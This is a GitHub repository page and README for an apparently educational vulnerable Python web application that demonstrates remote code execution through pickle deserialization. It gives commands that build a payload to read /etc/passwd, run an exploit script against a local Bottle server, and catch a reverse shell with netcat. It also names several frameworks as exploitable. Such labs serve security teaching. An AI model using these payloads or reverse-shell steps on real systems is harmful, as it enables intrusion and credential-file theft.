Skip to content
Vulnerable Web Application Sample
Branch: master
Clone or download
Fetching latest commit…
Cannot retrieve the latest commit at this time.
Permalink
Type Name Latest commit message Commit time
Failed to load latest commit information.
python
.gitignore
LICENSE
README.md

README.md

vulnwebapp

Vulnerable Web Application Sample

===

Python Web Vuln App

Remote code execution with pickle.

Code execution with pickle.

example

$ cd python
$ python create_pickle_payload.py "cat /etc/passwd" > getpasswd.pickle
$ python -c 'import pickle; pickle.load(open("getpasswd.pickle"))'

Web Framework and pickle

pickleを利用した任意のコード実行とPython Web Framework

$ cd python/bottle
$ python server.py

Launch a reverse shell on target server

$ cd python
$ python bottle_exploit.py http://localhost:8000/ ThisIsSecretKey
$ nc localhost 12345

You got shell!!


You can exploit this vulnerability in the following frameworks

  • Bottle
  • Werkzeug
  • Flask
  • Pylons
  • Pyramid
  • Django
You can’t perform that action at this time.